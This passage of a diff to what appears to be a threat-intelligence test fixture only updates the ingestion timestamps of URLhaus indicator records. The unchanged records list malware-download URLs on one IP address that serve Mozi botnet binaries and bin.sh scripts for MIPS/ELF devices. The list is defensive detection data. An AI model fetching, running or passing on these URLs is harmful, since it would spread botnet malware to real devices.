 "original": "{\"id\":\"961108\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961108/\",\"url\":\"http://89.160.20.156:36316/bin.sh\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:29:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}",
 "category": "threat",
 "type": "indicator",
@@ -21356,7 +21356,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027722500Z",
+ "ingested": "2021-12-14T14:56:15.726581863Z",
 "original": "{\"id\":\"961107\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961107/\",\"url\":\"http://89.160.20.156:48105/bin.sh\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:28:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}",
 "category": "threat",
 "type": "indicator",
@@ -21405,7 +21405,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027729400Z",
+ "ingested": "2021-12-14T14:56:15.726582363Z",
 "original": "{\"id\":\"961103\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961103/\",\"url\":\"http://89.160.20.156:40017/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -21454,7 +21454,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027736300Z",
+ "ingested": "2021-12-14T14:56:15.726582725Z",
 "original": "{\"id\":\"961104\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961104/\",\"url\":\"http://89.160.20.156:41906/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -21503,7 +21503,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027743200Z",
+ "ingested": "2021-12-14T14:56:15.726583101Z",
 "original": "{\"id\":\"961105\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961105/\",\"url\":\"http://89.160.20.156:38607/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -21552,7 +21552,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027750100Z",
+ "ingested": "2021-12-14T14:56:15.726583462Z",
 "original": "{\"id\":\"961106\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961106/\",\"url\":\"http://89.160.20.156:59331/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -21601,7 +21601,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027756900Z",
+ "ingested": "2021-12-14T14:56:15.726584027Z",
 "original": "{\"id\":\"961102\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961102/\",\"url\":\"http://89.160.20.156:53932/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:24 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -21650,7 +21650,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027765100Z",
+ "ingested": "2021-12-14T14:56:15.726584389Z",
 "original": "{\"id\":\"961101\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961101/\",\"url\":\"http://89.160.20.156:58385/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -21699,7 +21699,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027772100Z",
+ "ingested": "2021-12-14T14:56:15.726584764Z",
 "original": "{\"id\":\"961099\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961099/\",\"url\":\"http://89.160.20.156:57010/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -21748,7 +21748,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027779100Z",
+ "ingested": "2021-12-14T14:56:15.726585131Z",
 "original": "{\"id\":\"961100\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961100/\",\"url\":\"http://89.160.20.156:59715/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -21797,7 +21797,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027786Z",
+ "ingested": "2021-12-14T14:56:15.726585554Z",
 "original": "{\"id\":\"961094\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961094/\",\"url\":\"http://89.160.20.156:57052/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -21846,7 +21846,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027793Z",
+ "ingested": "2021-12-14T14:56:15.726585924Z",
 "original": "{\"id\":\"961095\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961095/\",\"url\":\"http://89.160.20.156:60550/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -21895,7 +21895,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027800Z",
+ "ingested": "2021-12-14T14:56:15.726586305Z",
 "original": "{\"id\":\"961096\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961096/\",\"url\":\"http://89.160.20.156:39684/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -21944,7 +21944,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027807Z",
+ "ingested": "2021-12-14T14:56:15.726586673Z",
 "original": "{\"id\":\"961097\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961097/\",\"url\":\"http://89.160.20.156:43593/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -21993,7 +21993,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027813900Z",
+ "ingested": "2021-12-14T14:56:15.726587036Z",
 "original": "{\"id\":\"961098\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961098/\",\"url\":\"http://89.160.20.156:36066/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -22042,7 +22042,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027820800Z",
+ "ingested": "2021-12-14T14:56:15.726587507Z",
 "original": "{\"id\":\"961093\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961093/\",\"url\":\"http://89.160.20.156:35006/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -22091,7 +22091,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027827700Z",
+ "ingested": "2021-12-14T14:56:15.726587870Z",
 "original": "{\"id\":\"961091\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961091/\",\"url\":\"http://89.160.20.156:38184/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -22140,7 +22140,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027834600Z",
+ "ingested": "2021-12-14T14:56:15.726588235Z",
 "original": "{\"id\":\"961092\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961092/\",\"url\":\"http://89.160.20.156:59027/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -22189,7 +22189,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027841500Z",
+ "ingested": "2021-12-14T14:56:15.726588625Z",
 "original": "{\"id\":\"961090\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961090/\",\"url\":\"http://89.160.20.156:50639/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -22238,7 +22238,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027850700Z", + "ingested": "2021-12-14T14:56:15.726588993Z", "original": "{\"id\":\"961086\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961086/\",\"url\":\"http://89.160.20.156:33534/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22287,7 +22287,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027857800Z", + "ingested": "2021-12-14T14:56:15.726589550Z", "original": "{\"id\":\"961087\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961087/\",\"url\":\"http://89.160.20.156:36316/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22336,7 +22336,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027865700Z", + "ingested": "2021-12-14T14:56:15.726589913Z", "original": "{\"id\":\"961088\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961088/\",\"url\":\"http://89.160.20.156:47120/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -22385,7 +22385,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027872800Z", + "ingested": "2021-12-14T14:56:15.726590293Z", "original": "{\"id\":\"961089\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961089/\",\"url\":\"http://89.160.20.156:46287/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22435,7 +22435,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027880Z", + "ingested": "2021-12-14T14:56:15.726590662Z", "original": "{\"id\":\"961085\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961085/\",\"url\":\"http://89.160.20.156:39536/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:14:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -22484,7 +22484,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027886900Z", + "ingested": "2021-12-14T14:56:15.726591192Z", "original": "{\"id\":\"961083\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961083/\",\"url\":\"http://89.160.20.156:40689/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -22533,7 +22533,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027893800Z", + "ingested": "2021-12-14T14:56:15.726591617Z", "original": "{\"id\":\"961084\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961084/\",\"url\":\"http://89.160.20.156:51123/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22582,7 +22582,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027900700Z", + "ingested": "2021-12-14T14:56:15.726592163Z", "original": "{\"id\":\"961082\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961082/\",\"url\":\"http://89.160.20.156:52540/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22631,7 +22631,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027907600Z", + "ingested": "2021-12-14T14:56:15.726592534Z", "original": "{\"id\":\"961081\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961081/\",\"url\":\"http://89.160.20.156:56964/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -22680,7 +22680,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027914500Z", + "ingested": "2021-12-14T14:56:15.726592898Z", "original": "{\"id\":\"961078\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961078/\",\"url\":\"http://89.160.20.156:57120/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22729,7 +22729,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027921400Z", + "ingested": "2021-12-14T14:56:15.726593373Z", "original": "{\"id\":\"961079\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961079/\",\"url\":\"http://89.160.20.156:44518/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22778,7 +22778,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027928600Z", + "ingested": "2021-12-14T14:56:15.726593741Z", "original": "{\"id\":\"961080\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961080/\",\"url\":\"http://89.160.20.156:50389/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -22827,7 +22827,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027936600Z", + "ingested": "2021-12-14T14:56:15.726594108Z", "original": "{\"id\":\"961077\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961077/\",\"url\":\"http://89.160.20.156:34335/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22876,7 +22876,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027943600Z", + "ingested": "2021-12-14T14:56:15.726594522Z", "original": "{\"id\":\"961069\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961069/\",\"url\":\"http://89.160.20.156:54865/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22925,7 +22925,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027950600Z", + "ingested": "2021-12-14T14:56:15.726594939Z", "original": "{\"id\":\"961070\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961070/\",\"url\":\"http://89.160.20.156:50773/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -22974,7 +22974,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027957400Z", + "ingested": "2021-12-14T14:56:15.726595405Z", "original": "{\"id\":\"961071\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961071/\",\"url\":\"http://89.160.20.156:52005/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23023,7 +23023,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028000500Z", + "ingested": "2021-12-14T14:56:15.726595808Z", "original": "{\"id\":\"961072\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961072/\",\"url\":\"http://89.160.20.156:56066/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23072,7 +23072,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028008900Z", + "ingested": "2021-12-14T14:56:15.726596182Z", "original": "{\"id\":\"961073\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961073/\",\"url\":\"http://89.160.20.156:32915/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -23121,7 +23121,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028016100Z", + "ingested": "2021-12-14T14:56:15.726596561Z", "original": "{\"id\":\"961074\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961074/\",\"url\":\"http://89.160.20.156:43462/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23170,7 +23170,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028023Z", + "ingested": "2021-12-14T14:56:15.726597082Z", "original": "{\"id\":\"961075\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961075/\",\"url\":\"http://89.160.20.156:33291/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23219,7 +23219,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028030Z", + "ingested": "2021-12-14T14:56:15.726597457Z", "original": "{\"id\":\"961076\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961076/\",\"url\":\"http://89.160.20.156:1440/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -23268,7 +23268,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028036800Z", + "ingested": "2021-12-14T14:56:15.726597996Z", "original": "{\"id\":\"961068\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961068/\",\"url\":\"http://89.160.20.156:55907/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23317,7 +23317,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028043900Z", + "ingested": "2021-12-14T14:56:15.726598368Z", "original": "{\"id\":\"961066\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961066/\",\"url\":\"http://89.160.20.156:33181/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23366,7 +23366,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028050800Z", + "ingested": "2021-12-14T14:56:15.726598735Z", "original": "{\"id\":\"961067\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961067/\",\"url\":\"http://89.160.20.156:44691/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
